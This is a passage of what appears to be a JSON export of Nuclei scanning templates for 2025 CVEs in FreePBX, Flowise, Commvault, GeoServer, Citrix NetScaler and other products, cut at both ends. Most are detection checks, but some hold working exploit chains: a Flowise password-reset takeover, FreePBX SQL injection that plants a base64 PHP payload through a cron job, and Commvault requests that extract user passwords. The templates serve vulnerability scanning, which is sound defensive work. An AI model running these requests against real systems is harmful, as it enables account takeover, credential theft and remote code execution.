remediation: |\n    Upgrade FOGProject to a version later than 1.5.10.1673 that implements proper authentication on all management endpoints.\n  reference:\n    - https://github.com/casp3r0x0/CVE-2025-58443\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-58443\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\n    cvss-score: 9.1\n    cve-id: CVE-2025-58443\n    epss-score: 0.18543\n    epss-percentile: 0.97124\n    cwe-id: CWE-287\n  metadata:\n    max-request: 3\n    vendor: fogproject\n    product: fogproject\n    fofa-query: icon_hash=\"-1952619005\"\n    shodan-query: http.favicon.hash:-1952619005\n  tags: cve,cve2025,fogproject,auth-bypass,vkev,vuln\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}\"\n\n    redirects: true\n    matchers:\n      - type: dsl\n        dsl:\n          - \"contains(body, 'FOG')\"\n          - \"status_code == 200\"\n        condition: and\n        internal: true\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/fog/management/index.php?node=about&sub=kernel\"\n      - \"{{BaseURL}}/fog/service/getversion.php?url={{interactsh-url}}\"\n\n    matchers-condition: or\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 200\"\n          - \"contains(interactsh_protocol,'dns')\"\n        condition: and\n\n      - type: dsl\n        dsl:\n          - \"status_code == 200\"\n          - \"regex('(?is)FOG.*Configuration.*(?:Kernel|bzImage)', body)\"\n        condition: and\n# digest: 4b0a00483046022100a2b0f5adbc8a45df317932663d280d5179ff5ca3983618b9a09a9c7b7ebcb788022100ec20f540fda95322afa92a62dd004aa44595e09ade281dac0ae658b0a0ae22bb:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2025/CVE-2025-58443.yaml","vuln_id":"cve-2025-58443"},{"raw":"id: CVE-2025-58434\n\ninfo:\n  name: Flowise <= 3.0.5 - Account Takeover\n  author: nukunga[seunghyeonJeon]\n  severity: critical\n  description: |\n    Flowise versions 3.0.5 and earlier had a vulnerability in the forgot-password endpoint, which returned valid reset tokens without authentication—allowing attackers to reset passwords and take over accounts.\n  impact: |\n    Unauthenticated attackers can obtain valid password reset tokens without authentication, enabling account takeover of any user including administrators through password reset attacks.\n  remediation: |\n    Upgrade Flowise to version 3.0.6 or later that properly protects password reset token generation.\n  reference:\n    - https://github.com/advisories/GHSA-wgpv-6j63-x5ph\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-58434\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2025-58434\n    epss-score: 0.49894\n    epss-percentile: 0.98846\n    cwe-id: CWE-306\n  metadata:\n    verified: true\n    shodan-query: http.title:\"Flowise - Build AI Agents, Visually\"\n  tags: cve,cve2025,flowise,ato,rce,unauth,vuln,ai\n\nvariables:\n  username: \"{{username}}\"\n  new_password: \"{{rand_text_alphanumeric(12)}}\"\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - raw:\n      - |\n        POST /api/v1/account/forgot-password HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"user\":{\"email\":\"{{username}}\"}}\n\n    extractors:\n      - type: regex\n        name: token\n        part: body\n        group: 1\n        regex:\n          - '\"tempToken\":\"([A-Za-z0-9]{64})\"'\n        internal: true\n\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code == 201\n        internal: true\n\n\n  - raw:\n      - |\n        POST /api/v1/account/reset-password HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\n          \"user\": {\n            \"email\": \"{{username}}\",\n            \"tempToken\": \"{{token}}\",\n            \"password\": \"{{new_password}}\"\n          }\n        }\n\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code == 201\n        internal: true\n\n  - raw:\n      - |\n        POST /api/v1/auth/login HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\n          \"email\": \"{{username}}\",\n          \"password\": \"{{new_password}}\"\n        }\n\n    matchers-condition: and\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code == 200\n          - contains_all(body, 'id', '{{username}}', 'activeWorkspaceId')\n        condition: and\n\n    extractors:\n      - type: dsl\n        dsl:\n          - '\"Password:\" + new_password'\n# digest: 4b0a00483046022100b2dca853bc2f19529ce2dc76151fc3206d1ff7f25568e3406e13f7cfb9c73b2b022100da912a2e9a82b1b230c6936855370ee99714188141e1026d21342779ec1914d5:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2025/CVE-2025-58434.yaml","vuln_id":"cve-2025-58434"},{"raw":"id: CVE-2025-58360\n\ninfo:\n  name: GeoServer - XML External Entity Injection\n  author: lbb,xbow,darses\n  severity: high\n  description: |\n    GeoServer 2.26.0 to 2.26.2 and 2.25.6 contains an XML External Entity (XXE) injection caused by insufficient sanitization of XML input in /geoserver/wms GetMap operation, letting attackers disclose files or cause DoS, exploit requires crafted XML input.\n  impact: |\n    Attackers can disclose sensitive files or cause denial of service by exploiting XML external entity processing.\n  remediation: |\n    Update to GeoServer 2.25.6, 2.26.3, 2.27.0 or later.\n  reference:\n    - https://github.com/geoserver/geoserver/security/advisories/GHSA-fjf5-xgmq-5525\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-58360\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L\n    cvss-score: 8.2\n    cve-id: CVE-2025-58360\n    epss-score: 0.64874\n    epss-percentile: 0.99211\n    cwe-id: CWE-611\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: osgeo\n    product: geoserver\n    shodan-query:\n      - title:\"geoserver\"\n      - 'http.html_hash:1093634893 \"Content-Disposition: inline\"'\n      - http.favicon.hash:97540678\n      - html:\"/geoserver/\"\n    fofa-query:\n      - title=\"geoserver\"\n      - app=\"geoserver\"\n      - icon_hash=\"97540678\"\n      - body=\"/geoserver/\"\n  tags: cve,cve2025,geoserver,xxe,wms,vkev,kev,vuln\n\nhttp:\n  - method: POST\n    path:\n      - \"{{BaseURL}}/geoserver/wfs?service=WMS&request=GetMap\"\n      - \"{{BaseURL}}/wfs?service=WMS&request=GetMap\"\n\n    headers:\n      Content-Type: application/vnd.ogc.sld+xml\n\n    body: |\n      <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n      <!DOCTYPE root [ <!ENTITY xxe SYSTEM \"/this_file_does_not_exist\"> ]>\n      <StyledLayerDescriptor version=\"1.0.0\">\n      <NamedLayer><Name>&xxe;</Name></NamedLayer>\n      </StyledLayerDescriptor>\n\n    stop-at-first-match: true\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        words:\n          - \"ServiceException\"\n          - \"java.io.FileNotFoundException\"\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100937228a269a2fc6d08a11f47c7423ac1595c7a01645b368f53d59446c0c9c94d022100c74e79bf36809753ba593c2b267ade0a38d24658d36e7d9b6525a5a93b52f0e0:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2025/CVE-2025-58360.yaml","vuln_id":"cve-2025-58360"},{"raw":"id: CVE-2025-58226\n\ninfo:\n  name: WordPress 3D FlipBook Plugin <= 1.16.17 - Sensitive Information Exposure\n  author: pussycat0x\n  severity: medium\n  description: |\n    The 3D FlipBook WordPress plugin (≤ v1.16.17) has a vulnerability where an unauthenticated AJAX action (fb3d_send_posts) exposes sensitive data. Attackers can access all flipbook posts—including password-protected content, metadata, PDF URLs, and plugin settings—without authorization.\n  impact: |\n    Attackers can retrieve embedded sensitive data, leading to information disclosure.\n  remediation: Update to the latest version.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/interactive-3d-flipbook-powered-physics-engine/\n    - https://patchstack.com/database/wordpress/plugin/interactive-3d-flipbook-powered-physics-engine/vulnerability/...\n    - https://plugins.svn.wordpress.org/interactive-3d-flipbook-powered-physics-engine/\n  metadata:\n    verified: true\n    max-request: 1\n    publicwww-query: \"/wp-content/plugins/interactive-3d-flipbook-powered-physics-engine/\"\n    fofa-query: body=\"/wp-content/plugins/interactive-3d-flipbook-powered-physics-engine/\"\n  tags: cve,cve2025,wordpress,wp-plugin,3d-flipbook,exposure,unauth\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-admin/admin-ajax.php?action=fb3d_send_posts\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"code\":'\n          - '\"posts\":'\n          - '\"title\":'\n          - '\"post_type\":\"3d-flip-book\"'\n        condition: and\n\n      - type: word\n        part: header\n        words:\n          - \"application/json\"\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: json\n        name: post_titles\n        part: body\n        json:\n          - '.posts[].title'\n# digest: 4b0a00483046022100f6de10c715bc15dbdc8809b2fc96a251481d9b4dd76a33561f8f28f007322ca5022100a99279a2016ff834c0ffecedf1acd9bc671a75c89ba6076083d41674937de8db:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2025/CVE-2025-58226.yaml","vuln_id":"cve-2025-58226"},{"raw":"id: CVE-2025-58179\n\ninfo:\n  name: Astro Cloudflare Adapter - Server Side Request Forgery\n  author: HoangAnhThai\n  severity: high\n  description: |\n    Astro is a web framework for content-driven websites. Versions 11.0.3 through 12.6.5 are vulnerable to SSRF when using Astro's Cloudflare adapter. When configured with output: 'server' while using the default imageService: 'compile', the generated image optimization endpoint doesn't check the URLs it receives, allowing content from unauthorized third-party domains to be served. a A bug in impacted versions of the @astrojs/cloudflare adapter for deployment on Cloudflare’s infrastructure, allows an attacker to bypass the third-party domain restrictions and serve any content from the vulnerable origin.\n  impact: |\n    Unauthenticated attackers can bypass third-party domain restrictions to serve arbitrary content from unauthorized domains through the image optimization endpoint, potentially enabling XSS attacks.\n  remediation: |\n    Upgrade Astro's @astrojs/cloudflare adapter to version 12.6.6 or later that properly validates image URLs.\n  reference:\n    - https://github.com/withastro/astro/commit/9ecf359\n    - https://github.com/advisories/GHSA-qpr4-c339-7vq8\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-58179\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N\n    cvss-score: 7.2\n    cve-id: CVE-2025-58179\n    epss-score: 0.00829\n    epss-percentile: 0.55971\n    cwe-id: CWE-918\n    cpe: cpe:2.3:a:withastro:astro:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: withastro\n    product: astro\n  tags: cve,cve2025,ssrf,xss,astro,cloudflare,vuln,vkev\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/_image?href=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/retool-xss.svg&f=svg\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '<script type=\"text/javascript'\n          - 'alert(document.domain);'\n        condition: and\n\n      - type: word\n        part: content_type\n        words:\n          - \"image/svg+xml\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a004730450220140e531457de4c1ab8949c11033c47d3e7f7c3c9bc6e3e0f6febc62efe10a463022100e3f3b3143967def51b92f9d83fe6e94d138e8171c23904ce8b68802339ef3bdb:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2025/CVE-2025-58179.yaml","vuln_id":"cve-2025-58179"},{"raw":"id: CVE-2025-58044\n\ninfo:\n  name: JumpServer - Open Redirect via Referer Header\n  author: DhiyaneshDk\n  severity: medium\n  description: |\n    JumpServer is an open source bastion host and an operation and maintenance security audit system. Prior to v3.10.19 and v4.10.5, The /core/i18n// endpoint uses the Referer header as the redirection target without proper validation, which could lead to an Open Redirect vulnerability.\n  impact: |\n    An attacker can craft a malicious link that, when clicked by a victim, redirects them toan attacker-controlled website. This can be used to steal credentials through phishing or to distribute malware.\n  remediation: |\n    Upgrade JumpServer to version 3.10.19 or later (for v3.x) or version 4.10.5 or later (for v4.x).\n  reference:\n    - https://github.com/jumpserver/jumpserver/security/advisories/GHSA-h762-mj7p-jwjq\n    - https://github.com/jumpserver/jumpserver/commit/36ae076cb021f16d2053a63651bc16d15a3ed53b\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-58044\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n    cvss-score: 6.1\n    cve-id: CVE-2025-58044\n    epss-score: 0.00488\n    epss-percentile: 0.411\n    cwe-id: CWE-601\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: fit2cloud\n    product: jumpserver\n    shodan-query: html:\"JumpServer 开源堡垒机\"\n  tags: cve,cve2025,jumpserver,redirect,open-redirect,fit2cloud\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/core/i18n/ko/\"\n\n    headers:\n      Referer: \"https://oast.pro\"\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: header\n        regex:\n          - '(?i)location:\\s*https?://oast\\.pro'\n\n      - type: status\n        status:\n          - 302\n# digest: 4a0a00473045022100d1807dd284dabb8a03d3a236cdd9123be6b80f52264e21c44400251574a989a8022076b15ce50d6ed6d69f3a33453c259843006db8ea33b917a36066641236f85ea7:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2025/CVE-2025-58044.yaml","vuln_id":"cve-2025-58044"},{"raw":"id: CVE-2025-57822\n\ninfo:\n  name: Next.js Middleware - Server-Side Request Forgery\n  author: prdngr,nicolas-latacora\n  severity: medium\n  description: |\n    In Next.js prior to versions 14.2.32 and 15.4.7, when request headerswere insecurely passed to NextResponse.next(), an attacker could exploit this behavior to perform Server-Side Request Forgery (SSRF) attacks.\n  impact: |\n    Attackers can manipulate request headers to perform SSRF attacks by forcing the server to make requests to arbitrary internal or external URLs when middleware passes headers unsafely.\n  remediation: |\n    Upgrade Next.js to version 14.2.32, 15.4.7, or later that properly validates and sanitizes request headers in NextResponse.next().\n  reference:\n    - https://github.com/vercel/next.js/security/advisories/GHSA-4342-x723-ch2f\n    - https://vercel.com/changelog/cve-2025-57822\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-57822\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N\n    cvss-score: 6.5\n    cve-id: CVE-2025-57822\n    epss-score: 0.02495\n    epss-percentile: 0.83964\n    cwe-id: CWE-918\n  metadata:\n    verified: true\n    vendor: vercel\n    product: next.js\n    shodan-query:\n      - cpe:\"cpe:2.3:a:zeit:next.js\"\n      - http.html:\"/_next/static\"\n    fofa-query:\n      - body=\"/_next/static\"\n  tags: cve,cve2025,ssrf,nextjs,oast,oob,vuln\n\nvariables:\n  cache-buster: \"{{rand_text_alpha(10)}}\"\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}\"\n\n    redirects: true\n    max-redirects: 3\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"_next/static\"\n        internal: true\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/?cb={{cache-buster}}\"\n\n    headers:\n      Location: \"https://oast.me\"\n      X-Middleware-Rewrite: \"https://oast.me\"\n\n    host-redirects: true\n    max-redirects: 3\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"<h1> Interactsh Server </h1>\"\n# digest: 4b0a00483046022100859f5a79be25c6b7bebd7edc7ad15d3816f0840e8d7b038a178149f6aaf69c8e02210093cc558c218157948b6b9107351a0b127fb79d31ea17efb62c271ad13088d028:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2025/CVE-2025-57822.yaml","vuln_id":"cve-2025-57822"},{"raw":"id: CVE-2025-57819\n\ninfo:\n  name: FreePBX - Remote Code Execution\n  author: watchtowr,pussycat0x,DhiyaneshDk\n  severity: critical\n  description: |\n    FreePBX 15, 16, and 17 contain a remote code execution caused by insufficiently sanitized user-supplied data in endpoints, letting unauthenticated attackers manipulate the database and execute code remotely, exploit requires no authentication.\n  impact: |\n    Unauthenticated attackers can manipulate database records through SQL injection and achieve remote code execution through file upload path traversal, achieving complete system compromise.\n  remediation: |\n    Upgrade FreePBX to version 15, 16, or 17 with the latest security patches and lock down administrator access as described in the FreePBX security advisory.\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2025-57819\n    epss-score: 0.85463\n    epss-percentile: 0.99711\n    cpe: cpe:2.3:a:sangoma:freepbx:*:*:*:*:*:*:*:*\n  reference:\n    - https://github.com/FreePBX/security-reporting/security/advisories/GHSA-m42g-xg4c-5f3h\n    - https://community.freepbx.org/t/security-advisory-please-lock-down-your-administrator-access/107203\n    - https://github.com/watchtowrlabs/watchTowr-vs-FreePBX-CVE-2025-57819\n    - https://labs.watchtowr.com/you-already-have-our-personal-data-take-our-phone-calls-too-freepbx-cve-2025-57819/\n  metadata:\n    vendor: sangoma\n    product: freepbx\n    shodan-query:\n      - http.title:\"freepbx\"\n      - http.favicon.hash:\"-1908328911\"\n      - http.favicon.hash:\"1574423538\"\n      - http.title:\"freepbx administration\"\n    fofa-query:\n      - icon_hash=\"-1908328911\"\n      - icon_hash=\"1574423538\"\n      - title=\"freepbx administration\"\n      - title=\"freepbx\"\n    google-query:\n      - intitle:\"freepbx administration\"\n      - intitle:\"freepbx\"\n  tags: cve,cve2025,freepbx,sqli,rce,kev,intrusive,vkev,vuln\n\nvariables:\n  filename: \"{{to_lower(rand_text_alpha(5))}}\"\n  username: \"{{to_lower(rand_text_alpha(6))}}\"\n  cmd: \"PD9waHAgaGVhZGVyKCd4X3BvYzogQ1ZFLTIwMjUtNTc4MTknKTsgZWNobyBzaGVsbF9leGVjKCd1bmFtZSAtYScpOyB1bmxpbmsoX19GSUxFX18pOyA/Pgo=\"\n\nflow: http(1) || http(2) && http(3) && http(4)\n\nhttp:\n  # Step 1: SQL Injection Detection in brand parameter\n  - method: GET\n    path:\n      - \"{{BaseURL}}/admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model&template=x&model=model&brand=x' AND EXTRACTVALUE(1,CONCAT('~USER:',(SELECT USER()),'~')) -- \"\n\n    matchers:\n      - type: regex\n        part: body\n        name: sqli\n        regex:\n          - 'XPATH syntax error.*~.*~'\n          - 'utility.functions.php'\n          - '~USER:([^~]+)~'\n        condition: and\n\n    extractors:\n      - type: regex\n        part: body\n        group: 1\n        regex:\n          - '~USER:([^~]+)~'\n\n  # Step 2: RCE Exploitation - Create cron job with self-deleting PHP payload\n  - raw:\n      - |\n        GET /admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model&template=x&model=model&brand=x'%20;INSERT%20INTO%20cron_jobs%20(modulename,jobname,command,class,schedule,max_runtime,enabled,execution_order)%20VALUES%20('sysadmin','{{username}}','echo%20%22{{cmd}}%22%7Cbase64%20-d%20%3E/var/www/html/{{filename}}.php',NULL,'*%20*%20*%20*%20*',30,1,1)%20--%20 HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"contains(body, 'Whoops') && status_code == 500\"\n        internal: true\n\n  # Execute self-deleting PHP payload and verify RCE\n  - raw:\n      - |\n        @timeout: 80s\n        GET /{{filename}}.php?x={{wait_for(70)}} HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        name: rce\n        dsl:\n          - \"contains(x_poc, 'CVE-2025-57819')\"\n\n    extractors:\n      - type: dsl\n        dsl:\n          - body\n\n  # Cleanup - Delete the poc cron job\n  - raw:\n      - |\n        GET /admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model&template=x&model=model&brand=x'%20;DELETE%20FROM%20cron_jobs%20WHERE%20jobname='{{username}}'%20--%20 HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        name: cleanup\n        dsl:\n          - \"contains(body, 'Whoops') && status_code == 500\"\n        internal: true\n# digest: 4b0a00483046022100f58ab693de62fbdf89a7a031e51a7d10b6262a3f8759cdb6a27ca96ef5ce321302210090bc280fa91014454f8f962497d6fe6dd9ec4180ce127eeeec150cc73d377bc9:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2025/CVE-2025-57819.yaml","vuln_id":"cve-2025-57819"},{"raw":"id: CVE-2025-57808\n\ninfo:\n  name: ESPHome - Authentication Bypass\n  author: sean-kim\n  severity: high\n  description: |\n    ESPHome 2025.8.0 contains an authentication bypass caused by improper validation of base64-encoded Authorization values in the web_server component, letting attackers access functionality without valid credentials, exploit requires crafted Authorization header.\n  impact: |\n    Attackers can bypass authentication to access web server functions, including OTA updates, potentially compromising device control.\n  remediation: |\n    Upgrade to version 2025.8.1 or later.\n  reference:\n    - https://cybersecuritynews.com/esphome-web-server-authentication-bypass/\n    - https://github.com/esphome/esphome/security/advisories/GHSA-mxh2-ccgj-8635\n    - https://esphome.io/components/web_server/\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: http.title:\"ESPHome\"\n  tags: cve,cve2025,auth-bypass,esphome,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}\"\n\n    host-redirects: true\n    max-redirects: 2\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 401'\n        internal: true\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/\"\n    headers:\n      Authorization: Basic\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"Dashboard - ESPHome\")'\n        condition: and\n# digest: 4b0a00483046022100f468feecaa85800515ac35dda5f3a71d029273757f1dbb45401f78866e956cd2022100be998886f966fa215b9730597d7b24f67deecda75f4ac53cad70dcdd2935cdea:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2025/CVE-2025-57808.yaml","vuln_id":"cve-2025-57808"},{"raw":"id: CVE-2025-57789\n\ninfo:\n  name: Commvault Initial Administrator Login Process Vulnerability\n  author: DhiyaneshDK,watchtowr\n  severity: medium\n  description: |\n    An issue was discovered in Commvault before 11.36.60.During the brief window between installation and the first administrator login, remote attackers may exploit the default credential to gain admin control. This is limited to the setup phase, before any jobs have been configured.\n  impact: |\n    Attackers can exploit default credentials during the brief setup window between installation and first administrator login to gain admin control of the Commvault instance.\n  remediation: |\n    Complete the initial administrator setup immediately after installation and change all default credentials.\n  reference:\n    - https://labs.watchtowr.com/guess-who-would-be-stupid-enough-to-rob-the-same-vault-twice-pre-auth-rce-chains-in-commvault/\n    - https://documentation.commvault.com/securityadvisories/CV_2025_08_4.html\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-57789\n  metadata:\n    verified: true\n    max-request: 2\n    shodan-query: http.favicon.hash:-542502280\n  tags: cve,cve2025,commandcenter,commvault,unauth,vuln\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/commandcenter/publicLink.do\"\n\n    extractors:\n      - type: regex\n        name: connection\n        group: 1\n        part: body\n        regex:\n          - '\"activeMQConnectionURL\":\"tcp:\\/\\/(.*?):\\d+.*\"'\n        internal: true\n\n  - raw:\n      - |\n        POST /commandcenter/api/Login HTTP/1.1\n        Host: {{Hostname}}\n        Accept: application/json\n        Content-Type: application/json;charset=UTF-8\n\n        {\n          \"username\": \"{{connection}}_localadmin__\",\n          \"password\": \"YSAtbG9jYWxhZG1pbg==\",\n          \"commserver\": \"{{connection}} -cs {{connection}}\"\n        }\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"application/json\")'\n          - 'contains_all(body, \"userGUID\",\"token\")'\n        condition: and\n# digest: 4a0a00473045022054e82be42d30b5984b24d31190713ebf401c7354fbcf8185cb6089d4f951dcaa022100c096de8c715e9f9630f7c34ae0a65c5c57a1f979d875d55e68a79fedb43ce0ee:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2025/CVE-2025-57789.yaml","vuln_id":"cve-2025-57789"},{"raw":"id: CVE-2025-57788\n\ninfo:\n  name: Commvault Unauthenticated Password Disclosure (WT-2025-0047)\n  author: DhiyaneshDK,iamnoooob,pdresearch,watchtowr\n  severity: medium\n  description: |\n    An issue was discovered in Commvault before 11.36.60. A vulnerability in a known login mechanism allows unauthenticated attackers to execute API calls without requiring user credentials. RBAC helps limit the exposure but does not eliminate risk.\n  impact: |\n    Unauthenticated attackers can exploit the public sharing login mechanism to access API endpoints and retrieve sensitive user information including passwords.\n  remediation: |\n    Upgrade Commvault to version 11.36.60 or later that properly restricts API access and removes the vulnerable login mechanism.\n  reference:\n    - https://labs.watchtowr.com/guess-who-would-be-stupid-enough-to-rob-the-same-vault-twice-pre-auth-rce-chains-in-commvault/\n    - https://documentation.commvault.com/securityadvisories/CV_2025_08_3.html\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: http.favicon.hash:-542502280\n  tags: cve,cve2025,commandcenter,commvault,unauth,vkev,vuln\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - raw:\n      - |\n        GET /commandcenter/publicLink.do HTTP/1.1\n        Host: {{Hostname}}\n\n    extractors:\n      - type: regex\n        part: body\n        name: guid\n        group: 1\n        regex:\n          - 'cv-gorkha\\\\\":\\\\\"(.*?)\\\\\"'\n        internal: true\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - 'cv-gorkha'\n        internal: true\n\n  - raw:\n      - |\n        POST /commandcenter/api/Login HTTP/1.1\n        Host: {{Hostname}}\n        Accept: application/json\n        Content-Type: application/json;charset=UTF-8\n\n        {\n          \"username\": \"_+_PublicSharingUser_\",\n          \"password\": \"{{base64(guid)}}\"\n        }\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '_+_PublicSharingUser_'\n          - 'Public Sharing User'\n          - 'token'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        part: body\n        name: token\n        group: 1\n        regex:\n          - '\"token\":\"(.*?)\"'\n        internal: true\n\n  - raw:\n      - |\n        GET /commandcenter/RestServlet/Database/GetUmUserById/1 HTTP/1.1\n        Host: {{Hostname}}\n        Accept: application/xml\n        Authtoken: {{token}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code == 200\n          - contains_all(body, 'login','email','password','datePasswordSet')\n        condition: and\n\n    extractors:\n      - type: json\n        part: body\n        name: password\n        json:\n          - \".password?\"\n        internal: true\n\n      - type: json\n        part: body\n        name: username\n        json:\n          - \".login?\"\n        internal: true\n\n      - type: json\n        part: body\n        name: email\n        json:\n          - \".email?\"\n        internal: true\n\n      - type: dsl\n        dsl:\n          - '\"username: \" + username + \" password:\" + password + \" email: \" + email'\n# digest: 4a0a00473045022007cfdbc4b3651d3f134cd65aafad58ab0b4d7c282dbd203b3827c21f2253db8f02210081da3f84706b276884f1312a7a9bc20994619993347bb65888b139f6373eb9f9:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2025/CVE-2025-57788.yaml","vuln_id":"cve-2025-57788"},{"raw":"id: CVE-2025-5777\n\ninfo:\n  name: Citrix NetScaler Memory Disclosure - CitrixBleed 2\n  author: watchtowr,DhiyaneshDk,darses\n  severity: critical\n  description: |\n    Insufficient input validation leading to memory overread on the NetScaler Management Interface NetScaler ADC and NetScaler Gateway\n  impact: |\n    Unauthenticated attackers can trigger memory overread conditions to leak sensitive information from NetScaler memory, potentially exposing session tokens and credentials similar to CitrixBleed.\n  remediation: |\n    Apply the security patches as described in Citrix support article CTX693420 and restrict access to the NetScaler Management Interface.\n  reference:\n    - https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX693420\n    - https://labs.watchtowr.com/how-much-more-must-we-bleed-citrix-netscaler-memory-disclosure-citrixbleed-2-cve-2025-5777/\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-5777\n  classification:\n    cve-id: CVE-2025-5777\n    cwe-id: CWE-457\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    epss-score: 0.99972\n    epss-percentile: 0.99977\n    cpe: cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:-:*:*:*,cpe:2.3:a:citrix:netscaler_gateway:*:*:*:*:*:*:*:*,cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:fips:*:*:*,cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:ndcpp:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query:\n      - title:\"NetScaler Gateway\"\n      - title:\"NetScaler AAA\"\n      - http.favicon.hash:-1166125415\n      - http.favicon.hash:-1292923998\n    fofa-query:\n      - title=\"NetScaler Gateway\"\n      - title=\"NetScaler AAA\"\n      - icon_hash=\"-1166125415\"\n      - icon_hash=\"-1292923998\"\n  tags: cve,cve2025,netscaler,citrix,exposure,kev,vkev,vuln\n\nhttp:\n  - raw:\n      - |+\n        POST /p/u/doAuthentication.do HTTP/1.0\n        Host: {{Hostname}}\n        bleed_attack: {{iteration}}\n        Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n        Content-Length: 5\n\n        login\n\n    unsafe: true\n    payloads:\n      iteration:\n        - \"{{rand_int(1,5)}}\"\n\n    extractors:\n      - type: regex\n        name: iv\n        part: body\n        group: 1\n        regex:\n          - '<InitialValue>([^<]{10,})</InitialValue>'\n        internal: true\n\n    stop-at-first-match: true\n    matchers:\n      - type: dsl\n        dsl:\n          - 'len(iv) > 0'\n          - 'contains(to_lower(header), 